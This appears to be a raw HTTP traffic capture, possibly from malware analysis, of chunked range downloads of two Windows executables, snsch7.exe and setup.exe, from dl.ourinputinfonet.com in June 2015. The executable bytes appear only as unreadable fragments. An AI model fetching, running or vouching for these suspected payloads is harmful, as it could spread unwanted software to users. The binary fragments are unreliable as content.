.CC......_...[.5..z...u..........i..s...a........7...<`.{L..,o#..Z.
\..?.F..c..._ux.Y....R......M.o'}.....2. .e..Y..#.1i...W.J,.B.N....../
.....Yn...p;....N.c.*.QhS.&.L....A.e..........{.iI.....Q.U= .4..q.5.`.
R.~..6..RER.d.6..<...i.G...M.C./..t.R.....d}b....P.8..fW....w.....(
.....X.P.b...q.w.!*.O5.4(.K.....F}W......L..9.DTWtA...4yMR.. ..p...ro;
...xQdm`..)..8.......|[email protected].<.....$U[..k...(...^;d
.......v...R..>.W.N.....J....Ls..N..D....d.Y..Z9.....C."1..8;.i.vs.
|...~........z..X.S..Gl....z.`q.....p.._]..jN.:.h*Ws;....tdW.~.....SF.
<.......}.x'...'W.....3.o.a.".....[....... ..n..,w.W.~.6..T...$B.%]
..K...j....X...}(...Z....p.T.h.....P..zc....9..H.....l....Di....Y.Z.{.
P..'.<^qld/...rQ..X....L3...FY....;....y.9/....>u;..O~,'.... ...
.Y...L.3#.9?:.....'5...k..(/6...'.#.=..-r.......Ve...T.8....{...r....;
O.......p.D. ..s..Y.$.5..X..-.Y...|.Eb...]..k.:.y.G.........tP|.....5M
.k........n..(.D.8.j..l^...j. ,.j....u4>....-hE;. .....]....$RIP.7.
..."x/L>C|5F........pg.d(.v`....P.c...(.A...R...otyx..N.a".c...<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=7250000-7499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:43 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=797

Content-Length: 250000

Content-Range: bytes 7250000-7499999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694603.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
|.0x...K.....V.;.>.4`....v...............`.Y.....w.:O....a/{.e0q.. 
.......16_M..P..r.Npkoe..3J.q...9...w.W..:..-.U....-...k&...."./.&E...
..S tq)~).Z$.8....Y.O..t..L-...,...\ ..e?.....GK.E!..=...0.]4).=1D....
........|-'.z~D.6.....(U.F.17.;...r........bF......E])~...e*....... ..
..ZCy-.....|. ..5........F!.%[email protected].%......Q$M^...o..h0...
[email protected][email protected].?.SX.#Rn.......s.Mc...(.#?.
......zs....A."w.o.......m.#.....f.Lt....|.....G`.M ........'.....?...
t.' .~.....di..D..Q..4.$)p..Ce..y.eK..5M...C.\.B....6av...>R.T.0tr.
.{...;qq../t).........{.<....p...kS...f.`.(/...0B.a.^...xuy.Y...X..
.U.87uW.......8.....j.x...1..cv..`......3a.j{.a..Q......L._....yD$...N
W..\...&(.W.....R.............u.8.^[email protected]
g2..e.b...L*;....."...zx[Nj.r,.4..A..D.,...}QPY. ....9..ji..O..z....y(
..gy).'AIV..8X.z...C.Jv........F.~}..2..Ko .....x...q..|.W #Nc..<..
.2...Qy..\......&w$b.].....5...P;`..R..._v......K...G..B...N....c>.
.S.a.W....]^..F.?nX..'.Z..]E.P..`E.y...~....v2["1....<d.....^...Wl/
..m................P.p5.pq....T.<i.......H1...Wk...lU.S......W]1[z.
G..>.i...#.Q,n.%_<H|.m.PS.2Ue.%.?...O" $5.3...:.......'.H:......
...%.&\..'.&.UQn.....q...i.z.SG...;Y.....?DT.....fu.1....F..d...8xb.|.
[%......^vD....dp2 t.I...B..1.}.'.\KiI][email protected];^W6..m..........O.R...
.......nq.{...q....0....Z.".... Z..T..$.F%..y..v.{f[...TY.~C.!...9..w]
.Di.u.~...:...}hr...3.#.P.........".....b|.i...C%.........._DZ...m..(|
.{.....[IjP.m.......U.S....dv,..$6.B.YR4.........cs4......tDy...i.<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=7500000-7749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:43 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=797

Content-Length: 250000

Content-Range: bytes 7500000-7749999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694603.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
..;..e...g...Qh...D..5....7................2a7.....E6..p/uY..u.-#.."s.
......j...k..K......~..8..ze.....H...ZLg'....l.P...m..4. .......@~-..&
gt;.d..'|..d.IkR.Jz....y..J.b.iT.! Kz.(.y.....0..}.-|...'......O..'.1.
..<..uW...^.i..J.-C..........C.....3_3&%.N.t..\......At....f..b...Q
I......Z...?..G.-..DR.......QJ.:.8.v.#.2W9q.......-.......}G..>{.i.
a.._-5*..!.Q4... ......z..}.-.v.Y.2..{..*.$..c ....M.HH'TV.=.!.../....
`..3 ..IMz.sZ-Cg._6....t.sV.Q_..h...Y.F,.h...R0.M.....D.N....... .F.U.
...%....564NE..,S.....>g9....9...>....n../s~....!X>...(..E...
Y%.}....q<0|.I.e#.,.AQ2.\..3.......e..Cm...._...H..7......<wg.."
.G....f.....d^..\..?t7....S.y..L...PK9vd...$.ng*,..{.8 -....xL..T.$...
!&.9cmv..^..W..............6.....Wp.CZ.(.]....xv.\n^YG....g;..uz.1....
]..E...?*...M..q$u.}......b.*iL..?..b....PPN{.{.5.......\..(.......z@.
.OF\O9./...#`.NW_ ..........5R.j..U......<?."...8......dh.........)
x..`..3..q.....2W.1.;k.^...?M..OH$v....74..x...kG.x.b.Q.W....k.j.t,o.@
"w.x...Q....N,B..{..&...e.B.@F.$...x...).....sD...v$.V.0...U._2...K0..
.J*.;..@.^..UsXq%.hD...M...y;..d>........}Pa.........../b.........X
..X.|5?.|.d..\.I.IJ.q..VA|..id...`..n...S..O]o....y..7...H6..5(_p.....
.I.x...W..F..........>[email protected]_.b.
.T...*N.......4.N.Yzd.........w.m.R.\...o(.....Y6.L.w.E.:.............
..........J...0OfR~<o.f..\..~j9.....b.9.7@<..7.qH.F."....XD..r..
-~,..L~.B.;b.....c'{C-Qr.t..D.|.. }.....G........x.j...I.u.....$...:.H
......6.rcr"&....lz$...;~...R:=.'..QW...T.. .Oj8................ M<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=7750000-7999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:43 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=797

Content-Length: 250000

Content-Range: bytes 7750000-7999999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694603.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.&v.....cOH..pD.....?.GZa{..8..- a..\.V.\@........$......l.....U^.....
.(........|.:"...8..^..(,K*^y...z.=..?....N.q..2:M..!KS]..&%.o.DoB.M..
[email protected].......]|..a.......y...#.e...........-.QP.=../K.........2.Y.....
5\..2,M....~<..3..3..5.9..t.....B..j...z.. ...J4..IC..... ......e.-
{ .x..eAOg._....w.m;....~..,...(.x..([email protected].. .O....X..8...3..Ra..
O_Z.....\.O...p*.ow.T6.Y!.*.J......h........./ .....L%..F....>.....
E.$ .....w.!qJ...$R....1D.*U...JE..i..%....t.....Fe.........{i......\/
.h.G.........kS..v...iW.P..........).nU.. bw..}J.=|...] !.....)k_.E}..
@._;*..?H..[...... G.0.....h...(........<...c.H.............X.....C
G.S,....@;.........#.;...x.l .t~%...[FM....J.b..8..:[email protected]..
.\...&.>...). ..K.n..p.... .C Z..#v....$*5{6([email protected]......=..EU..
...r.?.'..0uE.4:,.|.T.q...ZT.D.M.....,......;.........._o..n..O..n.J..
....G..rZ.9z9F..?.]Q?..%!.7.M.. .L.1n.....}.,1..].Lv.j-...frL..\...Z..
g.\C..X).....F.Q...U.R.Ked...)i]...w.........8[...=...D..N.).S.D..Ye..
r...k:.Q.a....T....61;...=p..l..mjM..M..4...x..........v.n....sD;)..9.
;...0.EP..:.v"......t"TW.....L.&.....p...........I..E........v..dk....
.e.{......G.R.B..".r1..\k?.C.FJ......xz..e....d..L.w....B..#.........0
.....AZ.`0..........|..T sa6..........._.$...i...-.d..{..?............
C...?..V..?.... C.P...h)..p......D'(^.Wq..0...su.t_.3E..jN_...... 2..0
[email protected].}e..'.....t?.%L..j@&^yS.....9..6..n.....N.......a
.I.....Lr.x$.3~.D&`.......:z.....3D2d..-.'0.H0~$..,......}No.^b.......
.ur...........o.....=4$H4|D..*Lzk.b.k.g'...hX..%p...F{8.n44..(.n..<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=8000000-8249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:44 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=796

Content-Length: 250000

Content-Range: bytes 8000000-8249999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694604.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
6..,..s..I<.5s..H.4|.{.vif.!.....c.W......*....uU.....an.q..M6.....
.*....6....N..tM....D./ .y.`:..f..aU.|.>y;..1..q.TF(.4..R...;H.N../
.78*@l.t.EM......b.u...7.......;..BF#.........O.1%.$....4ss,W....N...6
...uuNK..g....S..'.............L.KS:....rv...^qB...,.n ..lku.H..z..s..
A.~7.....d...5.l.t....@I..............:RvZ....P.l0.......y..........4.
[email protected]!ku...'[&..vb.w..U.........w
...b...<.jJ%...~.d*/[email protected]......_b.cQ[.1.H'$...kB..M...e....E
.I....T9a/0.S.Er.Z....6.fsAddc..Q.....y.......o...Cf..;..$R<%.$....
S_...`...l...$....t.........K...."..4..>....{.T...J. iem.....Fo.<
;.2.^...Q..P(p..h...W........j.X.l{Z..e.9..25~o%...""......DB..^..zD..
<G...X..T......*0^...........u.K.c.|Am..G.f.><.Ln$.[...t...uI
.wr..i..,gS..W..W.c.".....=v.!...,"Z..........:*..Y-......F....j%."I. 
..5U.0s...~W.5....I.....^.j7.d.....6.'.7..7v.w[.....EvKl..R[.........v
.......b*\D.51....u..c3E`[_..7y..{......6.0j...w........'.j...).$..(0.
..?.'t.d.B$...=.........q..d. ...S.......g}...hn...B....!t.......(..?-
c.%......xc.RO.......a.U.....q.(...K..X.............4.~.<......vy.O
..?.q..d..4B"X._.........|. n!....>..._...R.y.........E..p..]..TW.i
[email protected]..,..........iC....D......s...*.(G..r?{.[`
....b..[}.....v......0....^'.E.'..s.JIV.>..........{|2.*..t /p.  .&
gt;..<[email protected]]...p.zM.. ........Y...Sy.?...f.fw..@........[....U.
.q...N...ff .........V....)......_1~..'M.V.G.'.......e...l..D.K..Re.,.
.......=(.H....<z).M..;.E...e..=....D...}...#.....Y....=.e.....<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=8250000-8499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:44 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=796

Content-Length: 250000

Content-Range: bytes 8250000-8499999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694604.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.R.."6.K..k.8.y..W.......h...G.......Q.64..F".l'$1....-......Y'.....P.
..|XK..............>......p..@........%....Qn/....KZ(.G".....q.]...
."cJ..K.;..,...[....h...i..J..E.: a..w.JK....._M.....i...[.}.X..^.....
P|..7........`[. .k...2... ..tk`<....Y4i.Cn7.W]*7f..78i.......:)...
...R.!.#.k!.......A3h....x.....h.59.z.....'`..n!W.U.\3}6;..."....-...]
.M...o..^.....B.B. ...9g....^../<QH_.......l.R,...9.&.l.......p2..,
U..L.~...b:.....wD..r..m.N......n).g...,p-L>.U(A...n.A>......M._
r..qB..t.........h..J....4'9...o..s..w..J&..'-r..6i..By....45...f...g.
b...>...J:p.m.q0.#....-...t.v../....6lu...7=.4..$.6Gz.g.........q.(
qXv..?..g......}..d.&..6.9......[...\..e........B....0.cB.*(..s.......
T..f_.{...xIr7.TD..~G.).....-n.@ .0.8L^I...X.][email protected]
.V.7......O.Z.......H.:.4......jN..9.G=.b.?<...(...$0./.....O.u<
.N.Q.I......=S.....g...a%.3..f..<.P ^.@.......^.....Z:..k....."[...
.....|(.R(.....T|..@. ..q......t.lQ....V..=5.n..1... .ex.."..."i.#y.1a
. W.........U*.o}*....2&L..c3..0.6E0J...r...yq]..D.?.........E..h.u$0.
....Pk.~.U=zI |O..Y...;........."`\...i\6E](..IB084..>.P.F.N'..Yy.C
Q..7.p...&.R!)\..._..I0._.....1xuMJk.gZ.Q~.A.....!*.T.6.LJI...\T.'.1..
.....u...........]%.oi#.a.].BYy..|h.DUe...%.Ah.I\.}3...0\.,2A.b.b....1
3......D*..o.......!3;:...,.._..C..../..\..=.B...S=N..&3.?...!..&7^0..
>.....0. .^......;.r..........e..8],..`~...H.{v.....r.%....h.0..x\.
7.......a.....J3.-...M....u.1.Vv.......n...........x...w 0.K.!.j.H`~;.
(....~......-....i.<..>* ..wvT.<U......M...>.M../.....<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=8500000-8749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:44 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=796

Content-Length: 250000

Content-Range: bytes 8500000-8749999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694604.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
7-...3A...vc....%..!...?|...&X...]~.z'........s5_....{..e.6W.Ij.Xy...N
.^%2.WF&..k..Q. M..M..~1..O.;.,..G.,.I.n..E.....51.'.{...pI%_.V92.u9.6
....b....=\....K.a................4{.5O(.....'Rh...M"N.pz..V..;p1.....
ZOfx...Ni"..V...J.............Z.5(..%{....g..E.L..th.....4:..}f!..*...
.....i.k.:cpu..!>....8....Arh..|.........../Q.Q...a.."......N^...J.
.....h{i.k...[..j...X.H..,..&hU.Q..>...Ec.....3gW.L.7.<.......r\
....O".i....y.......j...vwRi.`..P=R.x....p...}.x. G.......q8I..j..=.[.
g-.o...Yn..........*.!m(.L.1=~?.`.8.......y..}cy...s&.......~...R.....
tJ...<.Ld..b.Z<....*/.%.[ .............)..,<.,...Sh.b.B...=..
.(!....L.B..e.V.........<.~.I.W..2R.-..O....$..... ..b)......dN....
..q........R...q.68k..,...z....}"!6......W....s.~.A*.'E...k&l..*V(..5.
.j.t.q.....=e.....V\..=h.vVO.d.z../...|//_..!.a........H...c....[..Er.
%.w&...Oiq.9w..y..<....S...gp.oB.<F.>...K6.$#..w.r.s]...hX>
;nF..vG..i{.#..4......:....... ....].L.......3.V4......y].{....wc_7..K
[email protected].,c....k..=.."..C..8X.'..Q&.....!...1...r..\Q.m"H...p.t
.}.Z....wX.;......U...'k.4>u./.K..... ...t.5.I...8...\...w..r.F!c.Q
..3.......2......h..;Ox..]uKt.ZINU.M.is...!Y...L...m.....c.X._g...!a.S
-.........Fi....*.G...\S..R;..Be...._p..#._.......O.y.....C@f8......&.
..\...^...L....9................X..D'.l....v.#.M..W@.%....*1`......)..
."$.]O.vD...X..G.F0.4..~p..|....^hL.../B..]eH..............gX...s_...w
[email protected]...... F......I?.3....Z.........
.../...l.d).~...]cr....t...z>.3.p...Xs.{.x..dO3.(.7..>nj?O..<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=8750000-8999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:44 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=763

Content-Length: 250000

Content-Range: bytes 8750000-8999999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694604.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
...5.V.Zy..q.g..Q........."c...FqC..N....j..0.......h8S.;b.nzTh.....Yj
b.'...~Z......8.\...y..jy.=..Y ...D7..#.~..:..D.'[email protected]
....mN....]..J.......\.......%.2....D. ..W....^..*.:..u.%. ...9i..@9..
[.PRF-M...5...V....F...=.......|(..w....Z.F.....|b..a3...g .4.A.'.6...
..'M.&A8..A....D!..R..N`....Q.u.9......v....?........Q.].. #..H"..>
;.>..~X.gu.)..?..&..l..B....(......]*....a...$3..O...L().....C::.H.
../.z!8!q.K...sAM.p]%..8.X...g..,...4....:[email protected]...........
I..8./..J0..w......B%.A.C[~.xP.n....,..j....;$Y.G.{...)4...#.).1F.,...
.....".......Q.E,R...(.L..............`...!... Y......|.. ....7;......
.......t.`.....`.$.o..3Gc.a1P.... ..:c..t~./.M.h.h.....ezX&...0.....N.
L....r..w.O.L.%[email protected]|..E.^L...[18...4v...
[email protected]....*>'.PU..G....S&..>...Z.Cs.
OSe..S ..Q.]....L....vT...."4..Cg.&.:.U3.-.:.3.....U.<..?.......E.j
...z.i..^].A..SS8.X....`...:.....Y.f.pBd..a......V~6....L..2l.........
j....J..Qo.I......m..PZ..C.G..u\x.....p....T.&|...Kh]6..pk^."..^"..Z..
[email protected]=.*].....TE%H.u8...z..xf..Y.h.D.........<.....
p.O..s..2.C,......-.....(.<...ZV....z..I....F?Z.....W...O.}...F...N
.'v.xN....M)..Y......m2..X..<...(... X.K]..0..i......J..a..]..!.f4.
...H6..Ky....(.........S.:.1..I.....O.V...~... ....i...7.2..LG%...C...
......a?..E...F.RA.^O!...!.N.!..E.jWik./.?}..0.f...s...t...).......B..
x..0...ITY._B..........H3}\698.vY..q...}....8.N....B.;.n..-.^..N...9..
....O..C....0...d..U.....JNk$IT.x...A.^.Z......B.X..........;!....<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=9000000-9249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:44 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=796

Content-Length: 250000

Content-Range: bytes 9000000-9249999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694604.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.mkU..(@uq.EQ..I.L....n..5YW{..l~.u..p.Vz..\.E.wc...q........&6.....k.
....^...._W`..Tw.c...wR<..G0.?{..O .-m.../....(.`..gt...cNAG..o.dZ?
..0m..c. .M.=Dk.^0......'>.o.j..rX..8. )..o......T......P.IZ.4.CR..
b1..[.....!..0....a...J...w.../.`.w.W|.. ..?...Ax..F..,(..7E..y{)'....
/>...M......KK....Cp..P.........~...o...1...v...]...pV...@....^.R.e
.x..K.l..].......l.*..8..7..^....Z.g...2....z9n.lz.r..b.d./.........SL
..h.u..Q.$....u."......Zz^G.<g.F.../JMj..b"".#.1x.H`.4zTA!."..B....
....(..~/....Dk.!.K,[email protected]{.D.x..Rw.......)'.(.K
sM....,.z.g O..;..5 .`"......S6`.....Q..x. K..^....`..!JI..F..#..%{s..
?{..?...e..\..z.x..N/...@q...$,..Q 4uav.I .......DU....3ln,...........
M.../2A~4$.@>.o..H97.o...Oq...._...V.tM..|.SF...ws.2.i...........R.
.T.9.h../....&k..w..:........n.@[email protected]...:...m.%d..2.|t.bU$.k).h....t
............a.fM...........(..bu.3sf.\CS ..Pq...a.....>r....2N._@Q.
.......H..Y4......c/........B..W.}...3.!.S..D... b..'\d..?..@.(...[9C.
...R-..Q..-..y...P#|Z.j.....^?.....w...q......{.....Sp.vd6.I.>3`..&
......4.......o..%...?0?....M$~..j..U\G.....f.....[K.m.f....(..../..x.
.......,..'.2...O...r..B.. .A$.(.>..exg.Aq.s.....$d........k..Tb..p
8K....V.6gp...E..'.......=.2.(J....:.1b.V.p ./Q.*r......../.}3.u....U.
.yv.|N&..x!.o&BD?|.C@j..|.q.A.d...r..>...i..?....[u.4O...c.)..Q.8d.
4....,I.A..:.....d..F"e<w...8#.;"...D......"..0....f...=.s>.hi..
...2F*l0.;.2..=..@|.a....X.'..3..X..\..../..j`y..k#.pL3X...p.>..^..
".....;..Q.....1..K.Q..!......ac..........#..U [email protected].<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=9250000-9499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:44 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=763

Content-Length: 250000

Content-Range: bytes 9250000-9499999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694604.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
....2.....&.......&......x.g......b./[.NQCu......h8..j.U.,.G...:... .W
<..3.G..;....m...."PKO^.......C.. ..oL{.g=.N....,.-s..B.3f.v.B.Sd.Y
...ney..G..P..e....Hb...&...2.........bC.]..I.......}>a.h..;.*Eo..@
N..\Cr./|.Mg......g5...KMH!.Iy.....CN2.[..\..zo..8...X!.M...Qs.t....#F
..w........1.,..ol0Z...JC<.;03'.H.f....PT4...W...."u.rtW.'8 .d.....
...-. D.p........V..3.#.a(...,.W..mtX...L....SExPo@*.v..%}..0.)..:....
f.fzgz3........gk..=m.d...#.4q../..M>.o......%G.?...7!....}...%&{L.
..<Y.C.y..v&...x\r`......h...9.I..r...oR..f....v[v=... ^?..2j.v.B.O
.y..z.....NXo....G{.JW.=..D^..g;. . ....z............!..../!.S,...p..M
.....pD._. N).7.*.fy.c.>jl.@[email protected]=%.^tR.h..2.=..n...j.
$....."..9..q.C.|0#.....:.R..t..;R.Q64...wK#............=......@......
.TJ..E......X.......8.=4.....Y.R).. .U|U.B.A....j........U#..crh.^.h.B
7!.p........vKq..ED~.te...lo....|I...L@I;(X...q..u..L..r2A..3.(.wa..H.
..q..g|...........)|".B..CQ......nq.....| \...f.g'?....%..X.W.d#.V~..p
..A....O........A.DF.f...*p.9........p"c......tF...3..}..N....yX......
;..M...gp..o$.&.._.&..~*.k..^...............`..KG...~....Q/.......1A1.
5.p..........\iD?.c<3M....x#.5....EV..a...x.D........s5.ugo...,..y.
 .....'.p..U......\.....$.....c!..\X.u..`,......y.nG..Q....B...2.>.
B...j.w...#..WV..H......u..)O...w............m.r1..%o.nH/.....xX.3....
../.[..@._....q...\.......;.. ..G...m.`i..R.8...O.D..b..-&......d>.
.w....w[...b.....Pbu......R.n*=.1..TgM.,w..&CHZ....5.D..5.....n.....%.
..M0..%`...e3...oV.I.I....wte".]..)KM4.K.6T.&..._=..gi. ..*.....m.<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=9500000-9749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=762

Content-Length: 250000

Content-Range: bytes 9500000-9749999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694605.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
L.A...3.8."0H...<..T.d.......U..7Fj....Y-...s0>.i..........f.,.X
4;9.<..S...T.............X[@...C.~...b.Tg..../..z.....C=_vX....9.F.
.#.. o.<..m.Y.F...Ho4.#JkB....9..k.k........c].`.....9.6....zJ"...m
..Gb......o`Ye.=T....-..}L...E.m...z..x.2..-. ..6J...;G..2......p.....
...^/....{[email protected],o.z..`;..<u...t..u...K/.\N.pP.9.Pg:..W.&.&.QI.T.
...Z.,..b..t'......J..).K.........0_.W.#...0'!.IW.?.V.......(u...6.._#
IDm4N#E.)...Q..2"7.5J.<.V. %$W.e2m..9.f...C..h........]..k."...~..k
.\.@/,.G._.)4.......0...UJJ...]...W/.....o."6.0...^...>nL9.*..o.;..
h..w..1Z&Yi...P.&.8.f.....}2..........i...n..kZ>D..M..J..=I..'..y.D
..`...P...........t.r..O.....Q?.S...^6s...]....xx.....7>...H..Fn.=.
.....g.0.r yJ....v.........='.Mt...%.Wu.?.....b.....l7^.t.s}(.A.S]... 
N~(L........I..wm..g.4 V.']>=.i[.^....Lh...2.....0........2...#...!
 ...S.pZj..K6E.9..=~.......Q.....q......".y.....'....._.#Z. ....&>.
w...2...4.n...>..4\.=.lh..Y......,....S(.<.Gp.~.3'..6\.nw..D...=
....D. .T......V.r.<?f....C.R}a?. ..r..=.#..q.3 d...1.Q.!.......A..
.!f$......tVO........%Q.....w*.#.v.*j....../.|1....3......j_.ADf...X.P
F.E.j.....9s...h.B..j%.B.z4n.'.y...6kk.).iz-...P|..%F...?.. .)........
....."..k.....t.C.M.z....Y.......$..4.`....tQb.X......{....`..h. .....
P....vU$ \..H..c....B.#Z...n.8g......{3..P.*[email protected].
/;)Yn.E. ;.Tc..._An..V.l_n..).y0.)...x;...D.......6uj.....6_.2..(MC.q.
H.....G...'......O.`.. [...z.c..2.*........*.'.>..x....uQ..(".;.=.E
......2..FZ"....oa..d5c.......}(./......7...t.&....k... ....fV~.v.<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=9750000-9999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=762

Content-Length: 250000

Content-Range: bytes 9750000-9999999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694605.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
..V....&3..<...X..l..e..C}..*h....VH[.R.,43%.........19.,...._..S.=
.."......X.v.X)..qG.VLV.F..e..v.F........9mN...u6.7. uIi....z..^...\*$
....5...%F..[. h.p...yg.......\...y...i?0A..J.E...t..cd.-#1..s$uP>y
...>..zX..c..C...Q.......c........&...rh.a[.....3Ta.A...q4Z.lV..'.W
#.........S.;...Q.. ^.R.x..9bMA.M6`....p...x...M|...\?.....m.c.a..V.C.
..MF..Z'[email protected].~..R..xa.|..].&;.lOp.%...Y..?*n.#..N.D..
>82../<.^ho.).....i(....M..X..u..t....u.D.].........Y.;..<QT.
..e.M.{k.@.<..C......P..|.3...GA....P.mF..-WT_..9ja.&X8..k..s.g.G.u
N.~..CR..LH..=.Q.......'..N.&=............ W{......i..pe|..N.)..Lsi...
..6.....B.1......E.....GJ...B.6..N......1..k....#.....^R...Kq..q.s6...
0sD...[l9G.{......kE|[email protected]..,,........UbrZ................~.....k...
"..V..<..oE.p..H..z...z.dPEh.ST...1=..j6.Y1..2&D@.<.!V&%c../..I&
m..Y..l..@......|...;Qh...p....Y.....5U......a...!X;....\....)9b.A.i..
.:."e......[&.}.9.....S....F......G6z.9..c.3d....U%.9.ySp).y...6..1...
d..s...T.%...x"<....(}.9n..;...G_.R%...)B.X....j...R..;.g.^z1.....o
.....S^..T.j....XP...K....A'.WC.$.....I......} ...z.8=....>L...(..o
^.J..........o.k.A..b."L..q'....^d1.._ [email protected];.....
....<$....*.f.,..{.i..:..J..R..5......F.....F.....8=.._....P......&
zV(..v.$5e]..N..f...T...t...?F.n..D|D.M.......#mmg..Zd.=..A..|..AE.A.P
